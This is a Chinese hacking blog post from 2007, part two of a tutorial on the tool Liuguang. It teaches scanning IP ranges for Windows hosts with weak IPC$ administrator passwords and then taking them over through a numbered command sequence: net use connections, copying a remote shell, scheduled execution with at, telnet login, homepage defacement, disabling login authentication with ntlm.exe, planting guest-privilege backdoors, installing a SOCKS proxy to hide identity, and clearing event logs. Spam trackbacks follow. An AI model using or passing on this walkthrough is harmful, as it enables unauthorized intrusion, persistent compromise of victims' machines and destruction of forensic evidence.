IPC$ 探测--流光基础教程(二)
[发布:阿拉丁 | 时间:2007-4-19 | 来源:本站原创] [字体:大 中 小]
--------------------------------------------------------------------------------
1:首先你的流光必须是FOR NT/2000的版本。98的是不可以的。因为IPC连接功能是NT/2000提供的功能,而流光FOR NT/2000/XP ,要求你的操作系统是NT/2000/XP的,否着流光就会启动失败!
什么是IPC:
IPC是指“INTERPROCESS COMMUNICATIONS” 准确的说是IPC$,是默认的在系统启动时的ADMIN共享
IPC$是windowsNT/2K中特有的远程网络管理登陆功能,他的特点是在同一时间内,两个IP之间只允许建立一个连接
警告:你试图通过IPC$连接会在ecentlog中留下记录,不管你是否登陆成功。
小问题:可不可以通过ipc$ 暴力破解密码?当然是可以!不过是不是有点太笨了啊
2:启动流光,在主页上可以有集中方法来通过IPC,这里我们要做的是获得一台主机的管理权限并最终将这个主机做成跳板,那么就可以用命中率高的办法来探测了。。即测试一批IP来得到弱口令。
在主界面选择“探测—探测POP3/FTP/NT/SQL主机”选项。或者直接按CTRL+R,然后弹出“主机扫描设置”对话框。
3:输入我们要破解的IP段,在选项中我们把“frontpage”主机自动加入HTTP主机列表取消。因为我们只想获得IPC弱口令,这样可以加快扫描的速度,加入IP,选择扫描NT/98主机,需要说明的是这里我们可以选择的还有很多,包括SQL/FTP/POP3等等,灵活运用可以给我今后的探测工作带来很大的方便
4:探测中……
警告:如果你要探测的是流光保留的国内IP段会被禁止的,也就是探测的时候信息栏会出现“IP保留”的字样,免得初学HACKER的你误伤国内的站点的同时给自己带来麻烦!
5:扫描到的NT/98主机列表(我就不贴了)
6:没有扫描到密码的,就不用看报告了
7:有了NT/98的机器了,就可以正式开始IPC$,右键点击谈探测的“IPC$主机—探测—探测所有IPC$用户列表”。或者按键盘的CTRL+F9
8:注意下面两个复选框的设置,把两个都选上,因为我们只要ipc$管理员的弱口令,而且只要有一个就可以了,然后点“选项”。
9:点“选项”后,弹出“用户列表选项”对话框,为了加快弱口令扫描速度,我们把它全部取消,比如第二个选项,既然对方景致列出用户了,我想对于一个网管来说,弱口令可能性也是微乎其微的
10:探测中……很快就出现破解成功的提示,上面的FTP主机(IP192.168.0.1)也有了相应的变化。
11:又出现查看报告的窗口,这次有结果,当然要仔细看看
12:有远程主机的管理密码了,我们剩下的就是想办法控制他
了,有什么好办法呢?当然有很多了,比如在“工具——NT/IIS工具”菜单下,这些我们以后在说,今天还是先练习NET命令吧,这样有利于我们了解这些命令究竟是在完成些什么样的功能
13:目标是如何被黑的
开个DOS命令提示符窗口执行命令如下命令 “||”后面是说明
1)net use \对方IPipc$“密码” /user:“用户名”||与对方建立ipc$ 远程连接
2)copy icmd.exe \对方ipadmin$ ||admin$是对方的winnt目录,这里存放文件多
3)net time \对方ip ||查看对方的系统时间
4)at \对方ip 程序启动的时间 启动程序名 启动程序的参数 ||用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代3/4两步。
5)tenlent 对方ip 端口 ||通过远程服务端口远程登陆目标主机
6)输入pass(口令) ||如果不是就用icmd.exe,或者没有设置口令就不用了
7)在开个窗口,继续copy我们要用的东西,copy sock.exe、copy ntlm.exe、copy vclear.exe。如果我们真的想黑了它,只需要把我们的首页文件覆盖目标的首页就OK了。我们可以通过在跟目录执行dir /s default.htm 或者dir /s index.htm来确定对方的首页的位置,一般是在X:interpubwwwroot就可以用修改好的首页覆盖对方的首页
8)其实黑人家是很不道德的而且违法的,我们最还是物有所值,做成跳板吧,今后干活方便点。执行我们copy 过去的ntlm.exe取消登陆验证。再给自己留个后门,比如提升guest的权限,或者其他的后门工具,这类东西有很多,自己选吧
9)做个sock5代理玩玩,用在QQ上面不错哦
执行我们copy过去的sock -install,net start skserver ,看看用在QQ上的效果,这样就可以隐藏自己的真实身份了,而且在局域网也可以通过服务器上QQ了
10)问题思考:还能够做成其它的吗?
当然了,只要你有时间,而且愿意做,一个个人专用的服务器在你面前,你想做什么都可以
14:日志清除,断开连接:
支持我们copy 过去的cl.exe clear.exe都可以清除日志,比如clear all :清除所有日志。然后断开连接:net use \对方IPIPC$ /delete 这一步是必须的,尤其是在一些有争议的站点上,或者是国内的站点,除非你想让电视报导XXX地区又捕获黑客一名XXX
引用通告(97):https://www.doczj.com/doc/c714287140.html,/blog_tb.asp?id=36
--------------------------------------------------------------------------------
上篇日志:FTP/POP3探测--流光基础教程(一)
下篇日志:爆汗~~~让IP地址每秒变一次!
相关评论与引用通告
引用通告:ky99ky99 于 2010-6-21
标题:快意网站推广软件https://www.doczj.com/doc/c714287140.html,
链接:https://www.doczj.com/doc/c714287140.html,
摘要:快意网站推广软件https://www.doczj.com/doc/c714287140.html,
引用通告:pRwtODzM 于 2010-6-8
标题:最好的博客群建
软件https://www.doczj.com/doc/c714287140.html,
链接:https://www.doczj.com/doc/c714287140.html,
摘要:最好的博客群建软件https://www.doczj.com/doc/c714287140.html,
引用通告:5PYiUg6d 于 2010-6-7
标题:电子烟,驱蚊手环,健尔马足疗机价格厂家优惠批发
链接:https://www.doczj.com/doc/c714287140.html,/
摘要:电子烟,驱蚊手环,健尔马足疗机价格厂家优惠批发
引用通告:sittQOhG 于 2010-6-7
标题:中国门都网-钢木门,实木门,防盗门十大品牌排名
链接:https://www.doczj.com/doc/c714287140.html,/
摘要:中国门都网-钢木门,实木门,防盗门十大品牌排名
引用通告:avTlKODw 于 2010-5-27
标题:最好的网站推广软件https://www.doczj.com/doc/c714287140.html,
链接:https://www.doczj.com/doc/c714287140.html,
摘要:最好的网站推广软件https://www.doczj.com/doc/c714287140.html,
请先登录再发表评论
帐号:
密码:
Cookie:不保存保存一天保存一月保存一年
免注册发布广告(需审核)
博主:阿拉丁
加好友 发短信 送音乐
分 类
骇客攻防[154]
民主自由及其他[6]
日 历
73 2010 - 6 48
日 一 二 三 四 五 六
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30
最 新
王建:战争或成美阻止..
菜鸟攻略:用vb结合ba..
vb程序把自身添加到开..
用vb做成的键盘鼠标事..
怎么生成VB程序执行文..
自动备份文件,超好用..
开机启动项
让bat文件后台运行
运用自制.bat文件突破..
纯脚本套牢你的动态ip..
精 华
暂无
热 门
汉语姓名字典素材
CGI漏洞的利用
FTP/POP3探测--流光基..
用批处理生成密码字典..
FINGER命令详解
密码习惯
IPC$ 探测--流光基础教..
制作自己的黑客字典- ..
端口映射原理-端口映射..
coolfire黑客入门教程..
评 论
If one has..
祝你天天好心情!开心..
[url=http://www.ksd...
搜 索
标题 内容 会员